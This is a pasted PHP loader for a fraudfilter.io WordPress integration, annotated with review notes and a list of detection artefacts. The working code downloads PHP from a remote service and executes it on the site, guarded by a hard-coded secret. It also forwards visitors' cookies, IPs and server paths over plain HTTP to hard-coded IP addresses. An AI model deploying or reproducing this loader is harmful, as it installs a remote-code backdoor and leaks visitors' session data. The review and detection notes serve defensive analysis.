
Untitled

a guest
Jun 29th, 2017
  1. <?php
  2.  
  3. //ADVANCED fraudfilter.io TEMPLATE
  // Turns PHP error reporting off for the rest of the request. The setting is
  // process-wide, so it also hides errors raised by whatever code runs after
  // this file is loaded, not only by the loader class below.
  // NOTE(review): a file that silences diagnostics before doing network and
  // filesystem work is worth a closer look when found on a site.
  error_reporting(0);
  5.  
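  /**
   * Loader stub for the fraudfilter.io integration, client id "n5d1c".
   *
   * What the visible code does:
   *   - resolves the path "<home>/n5d1c.include.php", where <home> is the
   *     WordPress uploads base directory when wp_upload_dir() exists and this
   *     file's own directory otherwise;
   *   - when a request carries ff17x_sign, ff17x_time and ff17x_mode and the
   *     signature matches, runs diagnostics and/or downloads the include file
   *     from api.fraudfilter.io, prints a JSON status and ends the request;
   *   - otherwise includes the previously downloaded file if it exists.
   *
   * Review notes (risk and detection, all taken from this file):
   *   - The include file is PHP fetched from a remote service and executed in
   *     the site's PHP process. Its only content check is a marker substring
   *     (see isSignature2ValidTemp); there is no cryptographic integrity check.
   *   - The control-request signature is SHA-1 over a secret that is hard-coded
   *     in this file plus a caller-supplied timestamp. No freshness window is
   *     enforced, and anyone who can read the file knows the secret.
   *   - Visitor request metadata, including the Cookie header, is forwarded
   *     over plain HTTP to a hard-coded IP address (see fillAllPostHeaders).
   *   - Artefacts to look for: "n5d1c.include.php" and
   *     "n5d1c.include.php.tempfile" in the uploads directory, the response
   *     header "X-FF: true", the query parameters ff17x_sign / ff17x_time /
   *     ff17x_mode / b65ae1n, and outbound traffic to api.fraudfilter.io,
   *     130.211.20.155 and 139.59.212.55.
   */
  class FraudFilterWordPressLoader_n5d1c {

      /**
       * Entry point: handles a signed control request if one is present,
       * otherwise includes the downloaded script.
       *
       * Publishes the resolved include path and its directory through the
       * globals $fbIncludedFileName and $fbIncludedHomeDir.
       */
      public function run() {
          global $fbIncludedFileName;
          global $fbIncludedHomeDir;

          $clid = $this->getClidTemp();

          if (function_exists('wp_upload_dir')) {
              $upload_dir = wp_upload_dir();
              $home = $upload_dir['basedir'];
          } else {
              $home = realpath(dirname(__FILE__));
          }
          $fileName = $home.'/'.$clid.'.include.php';

          $fbIncludedFileName = $fileName;
          $fbIncludedHomeDir = $home;

          if (isset($_GET['ff17x_sign']) && isset($_GET['ff17x_time']) && isset($_GET['ff17x_mode'])) {
              $mode = $_GET['ff17x_mode'];
              $isControlRequest = !file_exists($fileName) || $mode === 'diagnostics' || $mode === 'upgrade';

              if ($isControlRequest && $this->isSignatureValidTemp($_GET['ff17x_sign'], $_GET['ff17x_time'])) {
                  try {
                      // Full error output is switched on for the control path only.
                      error_reporting(-1);
                      $diagnosticsResult = $this->performDiagnosticsWP($home, $fileName);
                      $shouldDownload = $diagnosticsResult['success']
                          && ($mode !== 'diagnostics' || !file_exists($fileName));
                      if ($shouldDownload) {
                          $this->downloadScriptFirstTime($home, $fileName);
                      } else {
                          echo(json_encode($diagnosticsResult));
                      }
                  } catch (Exception $e) {
                      // NOTE(review): json_encode() of an Exception object carries no
                      // message text, so the caller only learns that something failed.
                      $errors = array();
                      $errors[] = $e;
                      $result = array('success' => false, 'errors' => $errors, 'version' => 4);
                      echo(json_encode($result));
                  }
                  die();
              }
          }

          // Executes whatever PHP was last written to the include path.
          if (file_exists($fileName)) {
              include($fileName);
          }
      }

      /**
       * @return string The client id baked into this template.
       */
      function getClidTemp() {
          return 'n5d1c';
      }

      /**
       * Checks the signature on a control request.
       *
       * The expected value is sha1("<secret>.<clid>.<time>"). The comparison is
       * constant-time where hash_equals() is available, and non-string input
       * (for example an array-valued query parameter) is rejected up front.
       *
       * NOTE(review): $time is not checked against the current time, so a
       * captured sign/time pair stays valid indefinitely.
       *
       * @param mixed $sign Signature supplied by the caller.
       * @param mixed $time Timestamp supplied by the caller.
       * @return bool
       */
      function isSignatureValidTemp($sign, $time) {
          if (!is_string($sign) || !is_scalar($time)) {
              return false;
          }
          $expected = sha1('e18ef6e3-b05f-4656-b10f-93ccedf2343d.'.$this->getClidTemp().'.'.$time);
          if (function_exists('hash_equals')) {
              return hash_equals($expected, $sign);
          }
          return $sign === $expected;
      }

      /**
       * Fetches the include script through the PHP stream wrapper.
       *
       * @param string $home     Unused here; kept for the existing call sites.
       * @param string $fileName Unused here; kept for the existing call sites.
       * @return string|false Response body, or false when the request fails.
       */
      function getUpgradeScriptViaContentsWP($home, $fileName) {
          $opts = array('http' =>
              array(
                  'method' => 'GET',
                  'header' => 'x-ff-secret: e18ef6e3-b05f-4656-b10f-93ccedf2343d',
                  'timeout' => 2
              )
          );

          $context = stream_context_create($opts);

          return file_get_contents($this->getFileNameForUpdatesWP("contents"), false, $context);
      }

      /**
       * @param string $type Transport label sent to the API ("contents" or "curl").
       * @return string URL of the update endpoint for this client id.
       */
      function getFileNameForUpdatesWP($type) {
          return "https://api.fraudfilter.io/v1/integration/get-updates?clid=".$this->getClidTemp().'&integrationType=WORDPRESS&type='.$type;
      }

      /**
       * Tells whether downloaded content carries the vendor marker text.
       *
       * Despite the name this is not a signature: any content that contains
       * the marker passes. A failed download (false) is rejected.
       *
       * @param mixed $content
       * @return bool
       */
      function isSignature2ValidTemp($content) {
          return is_string($content) && strpos($content, '@FraudFilter.io 20') !== false;
      }

      /**
       * Downloads the include script and writes it to $fileName, printing a
       * JSON status. Ends the request on failure.
       *
       * Tries the stream wrapper first and falls back to cURL. The write is
       * checked: success is reported only when the file opened and every byte
       * was written, and a partially written file is removed so that run()
       * does not include it later.
       *
       * @param string $home     Directory named in the permission hint.
       * @param string $fileName Destination path of the include file.
       */
      function downloadScriptFirstTime($home, $fileName) {
          $output = $this->getUpgradeScriptViaContentsWP($home, $fileName);

          if ($output === false || !$this->isSignature2ValidTemp($output)) {
              $output = false;
              if (function_exists('curl_init')) {
                  $ch = curl_init($this->getFileNameForUpdatesWP("curl"));

                  $headers = array();
                  $headers[] = 'x-ff-secret: e18ef6e3-b05f-4656-b10f-93ccedf2343d';

                  curl_setopt($ch, CURLOPT_DNS_CACHE_TIMEOUT, 120);
                  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
                  curl_setopt($ch, CURLOPT_TIMEOUT, 10);
                  curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
                  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                  curl_setopt($ch, CURLOPT_TCP_NODELAY, 1);

                  $output = curl_exec($ch);
                  // Closed here, where the handle is known to exist.
                  curl_close($ch);
              }

              if (!$this->isSignature2ValidTemp($output)) {
                  echo('{"success":false, "phpversion": "'.phpversion().'","version": 5, "errorMessage":"Malformed answer received from the server. Please try again"}');
                  die();
              }
          }

          $file = fopen($fileName, 'w');
          if (!$file) {
              // Built with json_encode(): the hand-assembled string closed its
              // quote early and was not valid JSON.
              echo(json_encode(array(
                  'success' => false,
                  'version' => 5,
                  'errorMessage' => 'Unable to write to php file: '.$fileName.'. Please issue 775 permission to the folder : '.$home
              )));
              die();
          }

          $written = fwrite($file, $output);
          fclose($file);

          if ($written === false || $written !== strlen($output)) {
              if (file_exists($fileName)) {
                  unlink($fileName);
              }
              echo(json_encode(array(
                  'success' => false,
                  'version' => 5,
                  'errorMessage' => 'Unable to save php file: '.$fileName.'. Please issue 775 permission to the folder : '.$home
              )));
              die();
          }

          echo('{"success":true, "phpversion": "'.phpversion().'","version": 5}');
      }

      /**
       * Probes whether a file can be created and deleted next to $fileName.
       *
       * @param string $home     Directory reported back in the error arguments.
       * @param string $fileName Include path; the probe file is "<fileName>.tempfile".
       * @return string|array "" when the probe succeeds, otherwise an array with
       *                      'code' and 'args' describing the failure.
       */
      function hasPermissionsIssuesWP($home, $fileName) {
          $tempFileName = $fileName.'.tempfile';

          // Output buffering swallows whatever fopen() prints on failure.
          ob_start();
          $tempFile = fopen($tempFileName, 'w');
          ob_end_clean();

          if (!$tempFile) {
              return array('code' => 'WRITE_PERMISSION','args' => array($tempFileName, $home));
          }

          fclose($tempFile);
          return unlink($tempFileName) ? "" : array('code' => 'UNABLE_TO_DELETE_TEMP_FILE','args' => array($tempFileName, $home));
      }

      /**
       * Runs the write-permission probe and both connectivity probes.
       *
       * Sends the response header "X-FF: true" as a side effect.
       *
       * @param string $home
       * @param string $fileName
       * @return array Diagnostics report; 'success' is false only when the
       *               permission probe failed.
       */
      function performDiagnosticsWP($home, $fileName) {
          header("X-FF: true");
          $errors = array();
          $extErrors = array();
          $success = true;

          $permissionsIssues = $this->hasPermissionsIssuesWP($home, $fileName);
          if ($permissionsIssues) {
              $extErrors[] = $permissionsIssues;
              $success = false;
          }

          $serverConnectionIssues = $this->getCurlConnectionIssuesWP();
          $contentsConnectionIssues = $this->getContentsConnectionIssuesWP();

          return array(
              'success' => $success,
              'diagnostics' => true,
              'extErrors' => $extErrors,
              'errors' => $errors,
              'version' => 5,
              'phpversion' => phpversion(),
              'connection' => $serverConnectionIssues,
              'contentsConnection' => $contentsConnectionIssues
          );
      }

      /** @return object Result of the cURL probe in diagnostics mode. */
      function getCurlConnectionIssuesWP() {
          return $this->sendRequestAndGetResultCurlWP2(true);
      }

      /** @return object Result of the stream-wrapper probe in diagnostics mode. */
      function getContentsConnectionIssuesWP() {
          return $this->sendRequestAndGetResultFileGetContentsWP2(true);
      }

      /**
       * @param bool $diagnostics
       * @return object Same as sendRequestAndGetResultCurlWP2().
       */
      function sendRequestAndGetResultWP2($diagnostics) {
          return $this->sendRequestAndGetResultCurlWP2($diagnostics);
      }

      /**
       * Builds the URL both transports post to.
       *
       * The caller-controlled b65ae1n value is URL-encoded before it is
       * appended, and non-string values are ignored.
       *
       * NOTE(review): the separators are kept exactly as in the original
       * ('&' before the first '?'); confirm against the server before
       * changing them.
       */
      private function ffBuildRequestUrl($diagnostics) {
          $url = "http://130.211.20.155/n5d1c";
          $nParam = 'b65ae1n';
          if (isset($_GET[$nParam]) && is_string($_GET[$nParam])) {
              $url = $url.'&'.$nParam.'='.urlencode($_GET[$nParam]);
          }
          if ($diagnostics) {
              $url = $url."?diagnostics=true";
          }
          return $url;
      }

      /** True when the answer starts with "0;" or "1;". */
      private function ffHasValidPrefix($output) {
          return ($output[0] === '0' || $output[0] === '1') && $output[1] === ';';
      }

      /**
       * Copies type, url and result out of an answer longer than three bytes.
       *
       * NOTE(review): the original tested `$output === '0'` to set result to 0,
       * which can never hold for an answer this long, so a "0;" answer leaves
       * result at false. That behaviour is kept; the intent was probably 0.
       * NOTE(review): type and url are taken from a plain-HTTP response even
       * when the prefix was reported as invalid.
       */
      private function ffFillAnswer($resultObj, $output) {
          $resultObj->type = substr($output, 2, 1);
          $resultObj->url = substr($output, 4);
          if ($output[0] === '1') {
              $resultObj->result = 1;
          }
      }

      /**
       * Posts the visitor's request metadata with cURL and parses the answer.
       *
       * @param bool $diagnostics When true, returns the raw answer, HTTP code
       *                          and cURL error number instead of parsing.
       * @return object Always has 'result'; other properties depend on the path.
       */
      function sendRequestAndGetResultCurlWP2($diagnostics) {
          $resultObj = (object)array('result' => false);

          // Checked on every path: without cURL the calls below would be fatal.
          if (!function_exists('curl_init')) {
              if ($diagnostics) {
                  $resultObj->curlAnswerType = "NO_CURL";
              }
              return $resultObj;
          }

          $ch = curl_init($this->ffBuildRequestUrl($diagnostics));

          curl_setopt($ch, CURLOPT_POST, 1);
          curl_setopt($ch, CURLOPT_DNS_CACHE_TIMEOUT, 120);
          curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
          curl_setopt($ch, CURLOPT_TIMEOUT, 5);
          curl_setopt($ch, CURLOPT_HTTPHEADER, $this->fillAllPostHeaders());
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
          curl_setopt($ch, CURLOPT_TCP_NODELAY, 1);

          $raw = curl_exec($ch);
          $curl_error_number = curl_errno($ch);
          $http_status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
          curl_close($ch);

          // curl_exec() returns false on failure; treat that as an empty answer.
          $output = is_string($raw) ? trim($raw) : '';
          $detail = 'curl_error_number_'.$curl_error_number.'_output'.$output.'_http_status_'.$http_status;

          if ($diagnostics) {
              $resultObj->curlAnswerType = "CURL_ANSWER";
              $resultObj->output = $output;
              $resultObj->httpCode = $http_status;
              $resultObj->curlErrorNumber = $curl_error_number;
          } else if ($output === '') {
              $this->notifyAboutError("EMPTY_ANSWER_".$detail);
          } else if (strlen($output) <= 3) {
              $this->notifyAboutError("SHORT_ANSWER_".$detail);
          } else {
              if (!$this->ffHasValidPrefix($output)) {
                  $this->notifyAboutError("INVALID_PREFIX_".$detail);
              }
              $this->ffFillAnswer($resultObj, $output);
          }

          return $resultObj;
      }

      /**
       * Same exchange as the cURL variant, through the PHP stream wrapper.
       *
       * @param bool $diagnostics When true, returns the raw answer unparsed.
       * @return object Always has 'result'; other properties depend on the path.
       */
      function sendRequestAndGetResultFileGetContentsWP2($diagnostics) {
          $time_start = microtime(true);

          $resultObj = (object)array('result' => false);

          $opts = array('http' =>
              array(
                  'method' => 'POST',
                  'header' => $this->getHeadersAsOneString($this->fillAllPostHeaders()),
                  'timeout' => 2,
                  'ignore_errors' => true
              )
          );

          $raw = file_get_contents($this->ffBuildRequestUrl($diagnostics), false, stream_context_create($opts));

          // file_get_contents() returns false on failure; treat as empty.
          $output = is_string($raw) ? trim($raw) : '';

          $diff = microtime(true) - $time_start;

          // The original read $curl_error_number and $http_status here without
          // ever defining them; they are empty on this transport, which keeps
          // the reported message text the same.
          $curl_error_number = '';
          $http_status = '';
          $detail = 'contents_error_number_'.$curl_error_number.'_output'.$output.'_http_status_'.$http_status;

          if ($diagnostics) {
              $resultObj->curlAnswerType = "CONTENTS_ANSWER";
              $resultObj->output = $output;
          } else if ($output === '') {
              $this->notifyAboutError("EMPTY_ANSWER_".$detail);
          } else if (strlen($output) <= 3) {
              $this->notifyAboutError("SHORT_ANSWER_".$detail);
          } else {
              if (!$this->ffHasValidPrefix($output)) {
                  $this->notifyAboutError('INVALID_PREFIX_contents_diff='.$diff.'_output='.$output);
              }
              $this->ffFillAnswer($resultObj, $output);
          }

          return $resultObj;
      }

      /**
       * Joins header lines into the single string the http stream context
       * expects, each line terminated by CRLF.
       *
       * NOTE(review): the listing shows the separator as a literal line break
       * inside the quotes, so its exact bytes cannot be recovered from the
       * page; CRLF is what HTTP specifies.
       *
       * @param array $headers List of "Name: value" strings.
       * @return string
       */
      function getHeadersAsOneString($headers) {
          $endline = "\r\n";
          $answer = "";
          foreach ($headers as $line) {
              $answer = $answer.$line.$endline;
          }
          return $answer;
      }

      /**
       * Builds the header list sent with every decision request.
       *
       * Each $_SERVER entry that is set is copied into an outgoing header.
       * NOTE(review): this includes the visitor's Cookie header, client IP
       * headers, request URI and server filesystem paths, and the request goes
       * out over plain HTTP.
       *
       * @return array List of "Name: value" strings.
       */
      function fillAllPostHeaders() {
          $headers = array();
          $headers[] = 'content-length: 0';
          $headers[] = 'X-FF-P: e18ef6e3-b05f-4656-b10f-93ccedf2343d';

          // Outgoing header name => $_SERVER key, in the original order.
          $forwarded = array(
              array('X-FF-REMOTE-ADDR', 'REMOTE_ADDR'),
              array('X-FF-X-FORWARDED-FOR', 'HTTP_X_FORWARDED_FOR'),
              array('X-FF-X-REAL-IP', 'HTTP_X_REAL_IP'),
              array('X-FF-DEVICE-STOCK-UA', 'HTTP_DEVICE_STOCK_UA'),
              array('X-FF-X-OPERAMINI-PHONE-UA', 'HTTP_X_OPERAMINI_PHONE_UA'),
              array('X-FF-HEROKU-APP-DIR', 'HEROKU_APP_DIR'),
              array('X-FF-X-FB-HTTP-ENGINE', 'X_FB_HTTP_ENGINE'),
              array('X-FF-X-PURPOSE', 'X_PURPOSE'),
              array('X-FF-REQUEST-SCHEME', 'REQUEST_SCHEME'),
              array('X-FF-CONTEXT-DOCUMENT-ROOT', 'CONTEXT_DOCUMENT_ROOT'),
              array('X-FF-SCRIPT-FILENAME', 'SCRIPT_FILENAME'),
              array('X-FF-REQUEST-URI', 'REQUEST_URI'),
              array('X-FF-SCRIPT-NAME', 'SCRIPT_NAME'),
              array('X-FF-PHP-SELF', 'PHP_SELF'),
              array('X-FF-REQUEST-TIME-FLOAT', 'REQUEST_TIME_FLOAT'),
              array('X-FF-COOKIE', 'HTTP_COOKIE'),
              array('X-FF-ACCEPT-ENCODING', 'HTTP_ACCEPT_ENCODING'),
              array('X-FF-ACCEPT-LANGUAGE', 'HTTP_ACCEPT_LANGUAGE'),
              array('X-FF-CF-CONNECTING-IP', 'HTTP_CF_CONNECTING_IP'),
              array('X-FF-INCAP-CLIENT-IP', 'HTTP_INCAP_CLIENT_IP'),
              array('X-FF-QUERY-STRING', 'QUERY_STRING'),
              array('X-FF-X-FORWARDED-FOR', 'X_FORWARDED_FOR'),
              array('X-FF-ACCEPT', 'HTTP_ACCEPT'),
              array('X-FF-X-WAP-PROFILE', 'X_WAP_PROFILE'),
              array('X-FF-PROFILE', 'PROFILE'),
              array('X-FF-WAP-PROFILE', 'WAP_PROFILE'),
              array('X-FF-REFERER', 'HTTP_REFERER'),
              array('X-FF-HOST', 'HTTP_HOST'),
              array('X-FF-VIA', 'HTTP_VIA'),
              array('X-FF-CONNECTION', 'HTTP_CONNECTION'),
              array('X-FF-X-REQUESTED-WITH', 'HTTP_X_REQUESTED_WITH'),
              array('User-Agent', 'HTTP_USER_AGENT'),
              array('Expected', ''),
          );
          foreach ($forwarded as $pair) {
              $this->addHeader($headers, $pair[0], $pair[1]);
          }

          // Position of the Host header among the incoming HTTP_* entries.
          $counter = 0;
          foreach ($this->getallheadersFF() as $key => $value) {
              if (strtolower($key) === 'host') {
                  $headers[] = 'X-FF-HOST-ORDER: '.$counter;
                  break;
              }
              $counter = $counter + 1;
          }
          return $headers;
      }

      /**
       * Rebuilds the incoming request headers from the HTTP_* entries of
       * $_SERVER, e.g. HTTP_USER_AGENT becomes "User-Agent".
       *
       * Starts from an empty array; the original started from an empty string,
       * which cannot take string keys on current PHP versions.
       *
       * @return array Header name => value, in $_SERVER order.
       */
      function getallheadersFF() {
          $headers = array();
          foreach ($_SERVER as $name => $value) {
              if (substr($name, 0, 5) == 'HTTP_') {
                  $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
              }
          }
          return $headers;
      }

      /**
       * Appends "$out: <value of $_SERVER[$in]>" to $headers when that entry is set.
       *
       * CR and LF are stripped from the value so that request data cannot add
       * extra lines to the outgoing header block.
       *
       * @param array  $headers Header list, modified in place.
       * @param string $out     Outgoing header name.
       * @param string $in      $_SERVER key to read.
       */
      function addHeader(& $headers, $out, $in) {
          if (!isset($_SERVER[$in])) {
              return;
          }
          $value = $_SERVER[$in];
          if (is_array($value)) {
              $value = implode(',', $value);
          }
          $value = str_replace(array("\r", "\n"), '', (string)$value);
          $headers[] = $out.': '.$value;
      }

      /**
       * Records an error code on a result object.
       *
       * Each non-null extra parameter is stored as a property whose name and
       * value are both that parameter.
       * NOTE(review): that looks unintended, but nothing in this file calls the
       * method, so it is left as written.
       *
       * @return object The same $resultObj.
       */
      function setError($resultObj, $code, $param1 = null, $param2 = null, $param3 = null) {
          $resultObj->errorCode = $code;
          $resultObj->error = $code;
          foreach (array($param1, $param2, $param3) as $param) {
              if ($param != null) {
                  $resultObj->$param = $param;
              }
          }
          return $resultObj;
      }

      /**
       * Reports an error string (truncated to 800 bytes) to the notify endpoint.
       *
       * The response is captured rather than printed: without
       * CURLOPT_RETURNTRANSFER, curl_exec() writes the remote body, fetched
       * over plain HTTP, straight into the page being served.
       *
       * @param string $message
       */
      function notifyAboutError($message) {
          if (!function_exists('curl_init')) {
              return;
          }
          if (strlen($message) > 800) {
              $message = substr($message, 0, 800);
          }
          $message = urlencode($message);

          $url = 'http://139.59.212.55/ff-notify.html?v=ff1&guid=n5d1c&m='.$message;
          $ch = curl_init($url);

          curl_setopt($ch, CURLOPT_DNS_CACHE_TIMEOUT, 3);
          curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
          curl_setopt($ch, CURLOPT_TIMEOUT, 3);
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

          curl_exec($ch);
          curl_close($ch);
      }

  }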
  421.  
  // Runs the loader as soon as this file is loaded: there is no hook or
  // condition around the call, so every request that loads the file reaches
  // run(). The instance stays in a script-level variable.
  // NOTE(review): presumably the downloaded include file reaches the loader
  // through this variable - it is not visible here, so confirm against it.
  $fraudFilterWordPressLoader_n5d1c = new FraudFilterWordPressLoader_n5d1c();
  $fraudFilterWordPressLoader_n5d1c->run();
  424.  
  425. // @FraudFilter.io 2017
  426. ?>